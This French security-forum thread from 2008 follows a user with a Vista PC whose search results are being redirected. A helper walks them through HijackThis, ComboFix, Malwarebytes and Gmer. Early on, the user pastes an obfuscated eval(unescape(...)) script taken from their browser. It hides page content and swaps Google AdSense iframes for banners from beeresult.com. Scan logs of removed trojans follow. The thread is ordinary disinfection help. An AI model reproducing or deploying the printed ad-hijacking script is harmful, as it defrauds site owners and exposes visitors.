dll créez par cmd = virus créez par cmd help !!!
Forum Sécurité - Virus : dll créez par cmd = virus créez par cmd help !!!
Aidez-moi stp, je suis attaqué, les virus se créer par une fenêtre cmd et J'ai Windows Defender et Nod32 ! Merci en avance !
Un bonjour ?
Quelle est cette dll ?
Répondre à Angeldark
Bonjour, désolé de ne pas l'avoir dit avant..Il y en a plein, Windows Defender dit qu'il les a supprimé mais j'ai l'impression qu'il en reste..comme quand je fait rechercher dans google et que je clique sur un lien sa me mène sur un site..et j'ai essayer de faire un test d'aide dans windows live puis sa marque un fameux script surment celui qui renvoit sur un autre site.. le voici :
| Citation : script>eval(unescape('%0D%0A%09%0D%0A%09document.write%28%27%3Cdiv%20id%3D%22asbakvg721%22%20style%3D%22height%3A3000px%3Bwidth%3A2000px%3Bleft%3A0px%3Btop%3A0px%3Bposition%3Aabsolute%3Bz-index%3A99999%3B%22%3E%3C%2Fdiv%3E%27%29%3B%0D%0A%09window.scroll%280%2C0%29%3B%0D%0A%09%0D%0A%09function%20init_b216dvsa6v%28%29%20%7B%0D%0A%09%09if%20%28arguments.callee.done%29%20return%3B%0D%0A%09%09arguments.callee.done%20%3D%20true%3B%0D%0A%0D%0A%09%09%0D%0Avar%20isadsensepage%20%3D%200%3B%0D%0Aresultsblock%20%3D%20document.body.getElementsByTagName%28%27iframe%27%29%3B%0D%0Afor%28var%20i%3D0%3B%20i%3Cresultsblock.length%3Bi%2B%2B%29%0D%0A%7B%0D%0A%09if%28resultsblock%5Bi%5D.src.indexOf%28%27pagead2.googlesyndication.com%27%29%21%3D-1%29%0D%0A%09%7B%0D%0A%09%09if%28%28google_ad_width%20%3D%3D%20728%29%20%26%26%20%28google_ad_height%20%3D%3D%2090%29%29%0D%0A%09%09resultsblock%5Bi%5D.src%20%3D%20%27http%3A%2F%2Fwww.beeresult.com%2Fbanner1.php%3Faffid%3D42%26country%3Dca%27%3B%0D%0A%09%7D%0D%0A%09if%28resultsblock%5Bi%5D.src.indexOf%28%27pagead2.googlesyndication.com%27%29%21%3D-1%29%0D%0A%09%7B%0D%0A%09%09if%28%28google_ad_width%20%3D%3D%20300%29%20%26%26%20%28google_ad_height%20%3D%3D%20250%29%29%0D%0A%09%09resultsblock%5Bi%5D.src%20%3D%20%27http%3A%2F%2Fwww.beeresult.com%2Fbanner2.php%3Faffid%3D42%26country%3Dca%27%3B%0D%0A%09%7D%0D%0A%09if%28resultsblock%5Bi%5D.src.indexOf%28%27pagead2.googlesyndication.com%27%29%21%3D-1%29%0D%0A%09%7B%0D%0A%09%09if%28%28google_ad_width%20%3D%3D%20468%29%20%26%26%20%28google_ad_height%20%3D%3D%2060%29%29%0D%0A%09%09resultsblock%5Bi%5D.src%20%3D%20%27http%3A%2F%2Fwww.beeresult.com%2Fbanner3.php%3Faffid%3D42%26country%3Dca%27%3B%0D%0A%09%7D%0D%0A%09if%28resultsblock%5Bi%5D.src.indexOf%28%27pagead2.googlesyndication.com%27%29%21%3D-1%29%0D%0A%09%7B%0D%0A%09%09if%28%28google_ad_width%20%3D%3D%20250%29%20%26%26%20%28google_ad_height%20%3D%3D%20250%29%29%0D%0A%09%09resultsblock%5Bi%5D.src%20%3D%20%27http%3A%2F%2Fwww.beeresult.com%2Fbanner4.php%3Faffid%3D42%27%3B%0D%0A%09%7D%0D%0A%09if%28resultsblock%5Bi%5D.src.indexOf%28%27pagead2.googlesyndication.com%27%29%21%3D-1%29%0D%0A%09%7B%0D%0A%09%09if%28%28google_ad_width%20%3D%3D%20200%29%20%26%26%20%28google_ad_height%20%3D%3D%20200%29%29%0D%0A%09%09resultsblock%5Bi%5D.src%20%3D%20%27http%3A%2F%2Fwww.beeresult.com%2Fbanner5.php%3Faffid%3D42%27%3B%0D%0A%09%7D%0D%0A%09if%28resultsblock%5Bi%5D.src.indexOf%28%27pagead2.googlesyndication.com%27%29%21%3D-1%29%0D%0A%09%7B%0D%0A%09%09if%28%28google_ad_width%20%3D%3D%20180%29%20%26%26%20%28google_ad_height%20%3D%3D%20150%29%29%0D%0A%09%09resultsblock%5Bi%5D.src%20%3D%20%27http%3A%2F%2Fwww.beeresult.com%2Fbanner6.php%3Faffid%3D42%27%3B%0D%0A%09%7D%0D%0A%09if%28resultsblock%5Bi%5D.src.indexOf%28%27pagead2.googlesyndication.com%27%29%21%3D-1%29%0D%0A%09%7B%0D%0A%09%09if%28%28google_ad_width%20%3D%3D%20160%29%20%26%26%20%28google_ad_height%20%3D%3D%20600%29%29%0D%0A%09%09resultsblock%5Bi%5D.src%20%3D%20%27http%3A%2F%2Fwww.beeresult.com%2Fbanner7.php%3Faffid%3D42%26country%3Dca%27%3B%0D%0A%09%7D%0D%0A%09if%28resultsblock%5Bi%5D.src.indexOf%28%27pagead2.googlesyndication.com%27%29%21%3D-1%29%0D%0A%09%7B%0D%0A%09%09if%28%28google_ad_width%20%3D%3D%20120%29%20%26%26%20%28google_ad_height%20%3D%3D%20600%29%29%0D%0A%09%09resultsblock%5Bi%5D.src%20%3D%20%27http%3A%2F%2Fwww.beeresult.com%2Fbanner8.php%3Faffid%3D42%26country%3Dca%27%3B%0D%0A%09%7D%0D%0A%09if%28resultsblock%5Bi%5D.src.indexOf%28%27pagead2.googlesyndication.com%27%29%21%3D-1%29%0D%0A%09%7B%0D%0A%09%09if%28%28google_ad_width%20%3D%3D%20160%29%20%26%26%20%28google_ad_height%20%3D%3D%20160%29%29%0D%0A%09%09resultsblock%5Bi%5D.src%20%3D%20%27http%3A%2F%2Fwww.beeresult.com%2Fbanner9.php%3Faffid%3D42%27%3B%0D%0A%09%7D%0D%0A%09if%28resultsblock%5Bi%5D.src.indexOf%28%27pagead2.googlesyndication.com%27%29%21%3D-1%29%0D%0A%09%7B%0D%0A%09%09if%28%28google_ad_width%20%3D%3D%20468%29%20%26%26%20%28google_ad_height%20%3D%3D%20180%29%29%0D%0A%09%09resultsblock%5Bi%5D.src%20%3D%20%27http%3A%2F%2Fwww.beeresult.com%2Fbanner10.php%3Faffid%3D42%26country%3Dca%27%3B%0D%0A%09%7D%0D%0A%09if%28resultsblock%5Bi%5D.src.indexOf%28%27pagead2.googlesyndication.com%27%29%21%3D-1%29%0D%0A%09%7B%0D%0A%09%09if%28%28google_ad_width%20%3D%3D%20336%29%20%26%26%20%28google_ad_height%20%3D%3D%20160%29%29%0D%0A%09%09resultsblock%5Bi%5D.src%20%3D%20%27http%3A%2F%2Fwww.beeresult.com%2Fbanner11.php%3Faffid%3D42%27%3B%0D%0A%09%7D%0D%0A%7D%0D%0A%0D%0A%09%09%0D%0A%09%09var%20hidderblock%20%3D%20document.getElementById%28%27asbakvg721%27%29%3B%0D%0A%09%09hidderblock.style.visibility%20%3D%20%27hidden%27%3B%0D%0A%09%09hidderblock.style.display%20%3D%20%27none%27%3B%0D%0A%09%09%0D%0A%09%7D%3B%0D%0A%09%28function%28i%29%20%7Bvar%20u%20%3Dnavigator.userAgent%3Bvar%20e%3D%2F%2A%40cc_on%21%40%2A%2Ffalse%3B%20var%20st%20%3D%0D%0AsetTimeout%3Bif%28%2Fwebkit%2Fi.test%28u%29%29%7Bst%28function%28%29%7Bvar%20dr%3Ddocument.readyState%3B%0D%0Aif%28dr%3D%3D%22loaded%22%7C%7Cdr%3D%3D%22complete%22%29%7Bi%28%29%7Delse%7Bst%28arguments.callee%2C10%29%3B%7D%7D%2C10%29%3B%7D%0D%0Aelse%20if%28%28%2Fmozilla%2Fi.test%28u%29%26%26%21%2F%28compati%29%2F.test%28u%29%29%20%7C%7C%20%28%2Fopera%2Fi.test%28u%29%29%29%7B%0D%0Adocument.addEventListener%28%22DOMContentLoaded%22%2Ci%2Cfalse%29%3B%20%7D%20else%20if%28e%29%7B%20%20%20%20%20%28%0D%0Afunction%28%29%7Bvar%20t%3Ddocument.createElement%28%27doc%3Ardy%27%29%3Btry%7Bt.doScroll%28%27left%27%29%3B%0D%0Ai%28%29%3Bt%3Dnull%3B%7Dcatch%28e%29%7Bst%28arguments.callee%2C0%29%3B%7D%7D%29%28%29%3B%7Delse%7Bwindow.onload%3Di%3B%7D%7D%29%28init_b216dvsa6v%29%3B'))" |
Oulah, je ne pense pas à une infection.
Télécharge puis installe Hijackthis (Trend Micro)
Poste ensuite un rapport dans ta prochaine réponse.
AIDE : Comment utiliser Hijackthis v2.0.2
Répondre à Angeldark
Exemple au lieu de : www.infos-du-net.com/telecharger/H [...] 1-454.html sa me donne : http://go.google.com/?u=AjjEsdh9gB [...] 691.111.46
Et il y a un fichier casino qui se créer sur le bureau à chaque démarage mais bon voici le Hijackthis :
Logfile of HijackThis v1.99.1
Scan saved at 07:49:46, on 2008-09-11
Platform: Unknown Windows (WinNT 6.00.1905 SP1)
MSIE: Internet Explorer v7.00 (7.00.6001.18000)
Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\taskeng.exe
C:\Program Files\Windows Defender\MSASCui.exe
C:\Windows\vVX3000.exe
C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe
C:\Program Files\CyberLink\PowerDVD8\PDVD8Serv.exe
C:\Program Files\CyberLink\Shared Files\brs.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Windows\RtHDVCpl.exe
C:\Program Files\ESET\nod32kui.exe
C:\Windows\ehome\ehtray.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Windows\ehome\ehmsas.exe
C:\Program Files\Windows Media Player\wmplayer.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Program Files\WinRAR\WinRAR.exe
C:\Users\ADMINI~1\AppData\Local\Temp\Rar$EX00.672\HijackThis.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: QXK Olive - {39F63908-E12A-4A21-A7EB-67CA3B876C52} - C:\Windows\vmgspntbmtk.dll (file missing)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Programme d'aide de l'Assistant de connexion Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O3 - Toolbar: (no name) - {D9119587-89B9-4EE6-A9C5-BFD4706509D0} - (no file)
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\Windows\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [VX3000] C:\Windows\vVX3000.exe
O4 - HKLM\..\Run: [LifeCam] "C:\Program Files\Microsoft LifeCam\LifeExp.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe"
O4 - HKLM\..\Run: [RemoteControl8] "C:\Program Files\CyberLink\PowerDVD8\PDVD8Serv.exe"
O4 - HKLM\..\Run: [PDVD8LanguageShortcut] "C:\Program Files\CyberLink\PowerDVD8\Language\Language.exe"
O4 - HKLM\..\Run: [BDRegion] C:\Program Files\Cyberlink\Shared Files\brs.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [GhostSurf Reminder] "C:\Program Files\GhostSurf 2005\Privacy Control Center.exe" reminder
O4 - HKLM\..\Run: [AppleSyncNotifier] C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier.exe
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [RtHDVCpl] RtHDVCpl.exe
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKLM\..\Run: [MSServer] rundll32.exe C:\Windows\system32\ljJYoOEv.dll,#1
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files\DAEMON Tools Lite\daemon.exe" -autorun
O4 - HKCU\..\Run: [AlcoholAutomount] "C:\Program Files\Alcohol Soft\Alcohol 52\axcmd.exe" /automount
O4 - HKCU\..\Run: [ehTray.exe] C:\Windows\ehome\ehTray.exe
O4 - HKCU\..\Run: [Steam] "C:\Program Files\Steam\Steam.exe" -silent
O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~1.0_0\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~1.0_0\bin\ssv.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\nlaapi.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\napinsp.dll
O10 - Unknown file in Winsock LSP: c:\program files\bonjour\mdnsnsp.dll
O11 - Options group: [INTERNATIONAL] International*
O13 - Gopher Prefix:
O16 - DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} (CKAVWebScan Object) - http://webscanner.kaspersky.fr/kavwebscan_unicode.cab
O18 - Protocol: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL
O23 - Service: Abyss Web Server (AbyssWebServer) - Aprelium Technologies - C:\Abyss Web Server\abyssws.exe
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Service Bonjour (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: @%SystemRoot%\ehome\ehstart.dll,-101 (ehstart) - Unknown owner - %windir%\system32\svchost.exe (file missing)
O23 - Service: @gpapi.dll,-112 (gpsvc) - Unknown owner - %windir%\system32\svchost.exe (file missing)
O23 - Service: Service de l'iPod (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Program Files\Eset\nod32krn.exe
O23 - Service: NVIDIA Display Driver Service (nvsvc) - NVIDIA Corporation - C:\Windows\system32\nvvsvc.exe
O23 - Service: PnkBstrA - Unknown owner - C:\Windows\system32\PnkBstrA.exe
O23 - Service: @%SystemRoot%\system32\qwave.dll,-1 (QWAVE) - Unknown owner - %windir%\system32\svchost.exe (file missing)
O23 - Service: @%SystemRoot%\system32\seclogon.dll,-7001 (seclogon) - Unknown owner - %windir%\system32\svchost.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files\Common Files\Steam\SteamService.exe
O23 - Service: @%ProgramFiles%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - %ProgramFiles%\Windows Media Player\wmpnetwk.exe (file missing)
Re,
Désactive tes protections résidentes (antivirus, Spybot-S&D, etc.) !
- Télécharge ComboFix (sUBs) sur ton Bureau.
- Double clique sur ComboFix.exe (le .exe n'est pas forcément visible) afin de le lancer.
- Lorsque la recherche sera terminée, un rapport apparaîtra. Poste ce rapport (C:\combofix.txt*) dans ta prochaine réponse.
AIDE : Un guide et un tutoriel sur l'utilisation de ComboFix
* le nom de la partition peut changer
Répondre à Angeldark
le lien ne marche pas..
Il fonctionne chez moi, tu es certain ?
Répondre à Angeldark
Error 404
Not Found
Powered by Abyss Web Server X1
© Aprelium Technologies - 2001-2007
Peut-être un virus qui bloque, je sais pas..
Bizarre.
Télécharge MalwareByte's Anti-Malware sur ton Bureau.
Installe-le en double-cliquant sur le fichier Download_mbam-setup.exe.
Une fois l'installation et la mise à jour effectuées, redémarre en mode sans échec.
AIDE : Redémarrer en mode sans échec
- Exécute maintenant MalwareByte's Anti-Malware. Si cela n'est pas déjà fait, sélectionne "Exécuter un examen complet".
- Afin de lancer la recherche, clic sur"Rechercher".
- Une fois le scan terminé, une fenêtre s'ouvre, clic sur OK. Deux possibilités s'offrent à toi :
-- si le programme n'a rien trouvé, appuie sur OK. Un rapport va apparaître, ferme-le.
-- si des infections sont présentes, clic sur "Afficher les résultats" puis sur "Supprimer la sélection". Enregistre le rapport sur ton Bureau afin de le poster dans ta prochaine réponse.
REMARQUE : Si MalwareByte's Anti-Malware a besoin de redémarrer pour terminer la suppression, accepte en cliquant sur Ok.
AIDE : Tuto en images sur MBAM
Répondre à Angeldark
Error 404
Not Found
Powered by Abyss Web Server X1
© Aprelium Technologies - 2001-2007
même affaire..je crois que je suis vraiment infecter..
J'ai réessayer en enlevant des procces et sa donne :
La connexion a échoué
Firefox ne peut établir de connexion avec le serveur à l'adresse www.malwarebytes.org.
Bien que le site semble valide, le navigateur n'a pas pu établir de connexion.
* Le site est peut-être temporairement indisponible ? Réessayez plus tard.
* D'autres sites sont aussi inaccessibles ? Vérifiez la connexion au réseau de votre ordinateur.
* Votre ordinateur ou votre réseau est-il protégé par un pare-feu ou un proxy ? Des paramètres incorrects peuvent interférer avec la navigation sur le Web.
* Vous avez toujours des problèmes ? Consultez votre administrateur réseau ou votre fournisseur d'accès à Internet pour obtenir de l'aide.
Bizarre 
Télécharge Gmer.
Dézippe le dans un dossier ou sur ton bureau.
Déconnecte toi d'Internet puis et ferme tous les programmes.
Double-clique sur Gmer.exe.
IMPORTANT: Si une alerte de ton antivirus apparaît pour le fichier gmer.sys ou gmer.exe, laisse le s'executer.
Clique sur l'onglet rootkit.
A droite, coche Files et Services.
Clique maintenant sur Scan.
Lorsque le scan est terminé, clique sur Copy.
Ouvre le Bloc-notes puis clique sur le Menu Edition / Coller.
Le rapport doit alors apparaître.
Enregistre le fichier sur ton bureau et copie/colle le contenu ici.
Répondre à Angeldark
La connexion a échoué
Firefox ne peut établir de connexion avec le serveur à l'adresse www.gmer.net.
Bien que le site semble valide, le navigateur n'a pas pu établir de connexion.
* Le site est peut-être temporairement indisponible ? Réessayez plus tard.
* D'autres sites sont aussi inaccessibles ? Vérifiez la connexion au réseau de votre ordinateur.
* Votre ordinateur ou votre réseau est-il protégé par un pare-feu ou un proxy ? Des paramètres incorrects peuvent interférer avec la navigation sur le Web.
* Vous avez toujours des problèmes ? Consultez votre administrateur réseau ou votre fournisseur d'accès à Internet pour obtenir de l'aide.
Tu as un autre pc ?
Répondre à Angeldark
ouais..!
Tu as essayé de transférer les fichiers d'un pc à l'autre ?
Répondre à Angeldark
non, j'y ai pas pensé je commence par lequel ?
Combofix 
Répondre à Angeldark
Combofix n'a fait que planter mon windows j'ai donc réparé et passé au suivant :
Malwarebytes' Anti-Malware 1.28
Version de la base de données: 1142
Windows 6.0.6001 Service Pack 1
2008-09-12 14:11:23
mbam-log-2008-09-12 (14-11-23).txt
Type de recherche: Examen complet (C:\|)
Eléments examinés: 155098
Temps écoulé: 28 minute(s), 7 second(s)
Processus mémoire infecté(s): 0
Module(s) mémoire infecté(s): 0
Clé(s) du Registre infectée(s): 4
Valeur(s) du Registre infectée(s): 1
Elément(s) de données du Registre infecté(s): 1
Dossier(s) infecté(s): 0
Fichier(s) infecté(s): 15
Processus mémoire infecté(s):
(Aucun élément nuisible détecté)
Module(s) mémoire infecté(s):
(Aucun élément nuisible détecté)
Clé(s) du Registre infectée(s):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\tdssdata (Trojan.Agent) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\tdss (Trojan.Agent) -> Quarantined and deleted successfully.
HKEY_CLASSES_ROOT\fqbewlna.bwmq (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_CLASSES_ROOT\fqbewlna.toolbar.1 (Trojan.FakeAlert) -> Quarantined and deleted successfully.
Valeur(s) du Registre infectée(s):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSServer (Malware.Trace) -> Quarantined and deleted successfully.
Elément(s) de données du Registre infecté(s):
HKEY_CLASSES_ROOT\regfile\shell\open\command\ (Broken.OpenCommand) -> Bad: ("regedit.exe" "%1" ) Good: (regedit.exe "%1" ) -> Quarantined and deleted successfully.
Dossier(s) infecté(s):
(Aucun élément nuisible détecté)
Et si tu lances Combofix maintenant ?
Répondre à Angeldark
Il fait planter windows se Combofix..je vous conseille de ne plus l'utiliser avec vista, je ne sais pas si avec xp il marche mais bon.. sinno c'est terminé ? J'ai plus de redirection dans google je peux accéder au site qui ne marchait pas, etc..
Euh il fonctionne très bien avec Vista, j'ai même testé chez moi.
Reposte un rapport Hijackthis.
Répondre à Angeldark
Logfile of HijackThis v1.99.1
Scan saved at 10:38, on 2008-09-13
Platform: Unknown Windows (WinNT 6.00.1905 SP1)
MSIE: Internet Explorer v7.00 (7.00.6001.18000)
Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Windows\Explorer.EXE
C:\Windows\System32\rundll32.exe
C:\Windows\vVX3000.exe
C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe
C:\Program Files\CyberLink\PowerDVD8\PDVD8Serv.exe
C:\Program Files\CyberLink\Shared Files\brs.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Windows\RtHDVCpl.exe
C:\Program Files\ESET\nod32kui.exe
C:\Windows\ehome\ehtray.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Program Files\AntiFreeze\AntiFreeze.exe
C:\Windows\ehome\ehmsas.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\WinRAR\WinRAR.exe
C:\Users\ADMINI~1\AppData\Local\Temp\Rar$EX00.390\HijackThis.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: (no name) - {39F63908-E12A-4A21-A7EB-67CA3B876C52} - (no file)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Programme d'aide de l'Assistant de connexion Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O3 - Toolbar: (no name) - {D9119587-89B9-4EE6-A9C5-BFD4706509D0} - (no file)
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\Windows\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [VX3000] C:\Windows\vVX3000.exe
O4 - HKLM\..\Run: [LifeCam] "C:\Program Files\Microsoft LifeCam\LifeExp.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe"
O4 - HKLM\..\Run: [RemoteControl8] "C:\Program Files\CyberLink\PowerDVD8\PDVD8Serv.exe"
O4 - HKLM\..\Run: [PDVD8LanguageShortcut] "C:\Program Files\CyberLink\PowerDVD8\Language\Language.exe"
O4 - HKLM\..\Run: [BDRegion] C:\Program Files\Cyberlink\Shared Files\brs.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
Il est complet le rapport ?
Répondre à Angeldark
ouais moi aussi je me dit qu'Il n'est pas très long comme rapport lol
Refais un rapport alors.
Répondre à Angeldark
Logfile of HijackThis v1.99.1
Scan saved at 14:04, on 2008-09-13
Platform: Unknown Windows (WinNT 6.00.1905 SP1)
MSIE: Internet Explorer v7.00 (7.00.6001.18000)
Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Windows\Explorer.EXE
C:\Windows\System32\rundll32.exe
C:\Windows\vVX3000.exe
C:\Program Files\CyberLink\PowerDVD8\PDVD8Serv.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Windows\RtHDVCpl.exe
C:\Program Files\ESET\nod32kui.exe
C:\Windows\ehome\ehtray.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Windows\ehome\ehmsas.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Windows Media Player\wmplayer.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Program Files\WinRAR\WinRAR.exe
C:\Users\Administrateur\Desktop\HijackThis.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: (no name) - {39F63908-E12A-4A21-A7EB-67CA3B876C52} - (no file)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Programme d'aide de l'Assistant de connexion Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O3 - Toolbar: (no name) - {D9119587-89B9-4EE6-A9C5-BFD4706509D0} - (no file)
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\Windows\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [VX3000] C:\Windows\vVX3000.exe
O4 - HKLM\..\Run: [LifeCam] "C:\Program Files\Microsoft LifeCam\LifeExp.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe"
O4 - HKLM\..\Run: [RemoteControl8] "C:\Program Files\CyberLink\PowerDVD8\PDVD8Serv.exe"
O4 - HKLM\..\Run: [PDVD8LanguageShortcut] "C:\Program Files\CyberLink\PowerDVD8\Language\Language.exe"
O4 - HKLM\..\Run: [BDRegion] C:\Program Files\Cyberlink\Shared Files\brs.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [AppleSyncNotifier] C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier.exe
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [RtHDVCpl] RtHDVCpl.exe
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKCU\..\Run: [AlcoholAutomount] "C:\Program Files\Alcohol Soft\Alcohol 52\axcmd.exe" /automount
O4 - HKCU\..\Run: [ehTray.exe] C:\Windows\ehome\ehTray.exe
O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe
O4 - HKCU\..\Run: [AntiFreeze] C:\Program Files\AntiFreeze\AntiFreeze.exe /splash
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~1.0_0\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~1.0_0\bin\ssv.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\nlaapi.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\napinsp.dll
O10 - Unknown file in Winsock LSP: c:\program files\bonjour\mdnsnsp.dll
O11 - Options group: [INTERNATIONAL] International*
O13 - Gopher Prefix:
O16 - DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} (CKAVWebScan Object) - http://webscanner.kaspersky.fr/kavwebscan_unicode.cab
O18 - Protocol: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Service Bonjour (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: @%SystemRoot%\ehome\ehstart.dll,-101 (ehstart) - Unknown owner - %windir%\system32\svchost.exe (file missing)
O23 - Service: @gpapi.dll,-112 (gpsvc) - Unknown owner - %windir%\system32\svchost.exe (file missing)
